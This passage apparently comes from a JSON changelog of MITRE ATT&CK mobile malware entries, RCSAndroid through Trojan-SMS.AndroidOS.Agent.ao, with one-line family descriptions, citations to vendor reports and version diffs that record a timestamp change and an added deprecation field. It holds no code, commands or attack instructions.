\"old_value\": \"2025-04-16 21:22:10.874000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:38.274000+00:00", + "modified": "2025-04-25 14:40:22.773000+00:00", + "name": "RCSAndroid", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) is Android malware. (Citation: TrendMicro-RCSAndroid)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0295", + "external_id": "S0295" + }, + { + "source_name": "RCSAndroid", + "description": "(Citation: TrendMicro-RCSAndroid)" + }, + { + "source_name": "TrendMicro-RCSAndroid", + "description": "Veo Zhang. (2015, July 21). 
Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "RCSAndroid" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:22.773000+00:00\", \"old_value\": \"2025-04-16 21:22:06.991000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-14 14:52:02.949000+00:00", + "modified": "2025-04-25 14:40:29.878000+00:00", + "name": "Red Alert 2.0", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0539", + "external_id": "S0539" + }, + { + "source_name": "Sophos Red Alert 2.0", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. 
Retrieved December 14, 2020.", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Red Alert 2.0" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:29.878000+00:00\", \"old_value\": \"2025-04-16 21:22:09.903000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-08-07 15:57:12.877000+00:00", + "modified": "2025-04-25 14:40:37.303000+00:00", + "name": "Riltok", + "description": "[Riltok](https://attack.mitre.org/software/S0403) is banking malware that uses phishing popups to collect user credentials.(Citation: Kaspersky Riltok June 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0403", + "external_id": "S0403" + }, + { + "source_name": "Kaspersky Riltok June 2019", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. 
Retrieved August 7, 2019.", + "url": "https://securelist.com/mobile-banker-riltok/91374/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Riltok" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:37.303000+00:00\", \"old_value\": \"2025-04-16 21:22:12.694000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:36:07.816000+00:00", + "modified": "2025-04-25 14:40:14.047000+00:00", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411", + "external_id": "S0411" + }, + { + "source_name": "securelist rotexy 2018", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan \u2013 banker and ransomware. 
Retrieved September 23, 2019.", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.047000+00:00\", \"old_value\": \"2025-04-16 21:22:03.463000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:48.917000+00:00", + "modified": "2025-04-25 14:40:31.880000+00:00", + "name": "RuMMS", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0313", + "external_id": "S0313" + }, + { + "source_name": "RuMMS", + "description": "(Citation: FireEye-RuMMS)" + }, + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. 
Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.880000+00:00\", \"old_value\": \"2025-04-16 21:22:10.719000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:38.690000+00:00", + "modified": "2025-04-25 14:40:39.602000+00:00", + "name": "ShiftyBug", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is an auto-rooting adware family of malware for Android. The family is very similar to the other Android families known as Shedun, Shuanet, Kemoge, though it is not believed all the families were created by the same group. (Citation: Lookout-Adware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0294", + "external_id": "S0294" + }, + { + "source_name": "ShiftyBug", + "description": "(Citation: Lookout-Adware)" + }, + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. 
Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:39.602000+00:00\", \"old_value\": \"2025-04-16 21:22:13.608000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 21:41:36.719000+00:00", + "modified": "2025-04-25 14:40:42.577000+00:00", + "name": "SilkBean", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) is a piece of Android surveillanceware containing comprehensive remote access tool (RAT) functionality that has been used in targeting of the Uyghur ethnic group.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0549", + "external_id": "S0549" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SilkBean" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.577000+00:00\", \"old_value\": \"2025-04-16 21:22:14.758000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-11-21 19:16:34.526000+00:00", + "modified": "2025-04-25 14:40:46.008000+00:00", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419", + "external_id": "S0419" + }, + { + "source_name": "CheckPoint SimBad 2019", + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. 
Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:46.008000+00:00\", \"old_value\": \"2025-04-16 21:22:16.143000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:23.488000+00:00", + "name": "Skygofree", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) is Android spyware that is believed to have been developed in 2014 and used through at least 2017. (Citation: Kaspersky-Skygofree)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0327", + "external_id": "S0327" + }, + { + "source_name": "Skygofree", + "description": "(Citation: Kaspersky-Skygofree)" + }, + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Skygofree" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.488000+00:00\", \"old_value\": \"2025-04-16 21:22:07.299000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:31.154000+00:00", + "name": "SpyDealer", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) is Android malware that exfiltrates sensitive data from Android devices. (Citation: PaloAlto-SpyDealer)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0324", + "external_id": "S0324" + }, + { + "source_name": "SpyDealer", + "description": "(Citation: PaloAlto-SpyDealer)" + }, + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpyDealer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.154000+00:00\", \"old_value\": \"2025-04-16 21:22:10.366000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.794000+00:00", + "modified": "2025-04-25 14:40:17.353000+00:00", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:17.353000+00:00\", \"old_value\": \"2025-04-16 21:22:04.768000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:14.412000+00:00", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Stealth Mango" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.412000+00:00\", \"old_value\": \"2025-04-16 21:22:03.669000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-18 20:14:46.858000+00:00", + "modified": "2025-04-25 14:40:43.667000+00:00", + "name": "TERRACOTTA", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) is an ad fraud botnet that has been capable of generating over 2 billion fraudulent requests per week.(Citation: WhiteOps TERRACOTTA)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0545", + "external_id": "S0545" + }, + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. 
Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TERRACOTTA" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:43.667000+00:00\", \"old_value\": \"2025-04-16 21:22:15.370000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:22.408000+00:00", + "name": "Tangelo", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) is iOS malware that is believed to be from the same developers as the [Stealth Mango](https://attack.mitre.org/software/S0328) Android malware. It is not a mobile application, but rather a Debian package that can only run on jailbroken iOS devices. (Citation: Lookout-StealthMango)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0329", + "external_id": "S0329" + }, + { + "source_name": "Tangelo", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Tangelo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:22.408000+00:00\", \"old_value\": \"2025-04-16 21:22:06.838000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-01-05 20:16:19.968000+00:00", + "modified": "2025-04-25 14:40:38.825000+00:00", + "name": "Tiktok Pro", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) is spyware that has been masquerading as the TikTok application.(Citation: Zscaler TikTok Spyware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0558", + "external_id": "S0558" + }, + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Tiktok Pro" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.825000+00:00\", \"old_value\": \"2025-04-16 21:22:13.285000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-16 14:33:12.034000+00:00", + "modified": "2025-04-25 14:40:44.380000+00:00", + "name": "Triada", + "description": "[Triada](https://attack.mitre.org/software/S0424) was first reported in 2016 as a second stage malware. Later versions in 2019 appeared with new techniques and as an initial downloader of other Trojan apps.(Citation: Kaspersky Triada March 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0424", + "external_id": "S0424" + }, + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. 
Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Triada" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:44.380000+00:00\", \"old_value\": \"2025-04-16 21:22:15.523000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 17:46:31.111000+00:00", + "modified": "2025-04-25 14:40:17.722000+00:00", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). [TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427", + "external_id": "S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. 
Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:17.722000+00:00\", \"old_value\": \"2025-04-16 21:22:04.918000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:46.411000+00:00", + "modified": "2025-04-25 14:40:34.229000+00:00", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": 